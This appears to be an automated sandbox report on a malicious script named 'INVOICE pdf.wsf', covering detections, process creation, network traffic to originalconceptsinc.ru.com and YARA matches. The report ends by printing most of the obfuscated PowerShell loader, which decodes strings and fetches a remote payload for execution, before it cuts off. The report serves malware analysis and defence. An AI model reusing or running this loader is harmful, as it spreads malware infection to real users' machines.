Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: INVOICE pdf.wsf |
ReversingLabs: Detection: 15% |
Source: |
Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1 |
Source: global traffic |
HTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: originalconceptsinc.ru.comConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: originalconceptsinc.ru.com |
Source: powershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com |
Source: powershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft. |
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi32_7984.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: INVOICE pdf.wsf |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7069 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7069 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7069 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7069 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChir |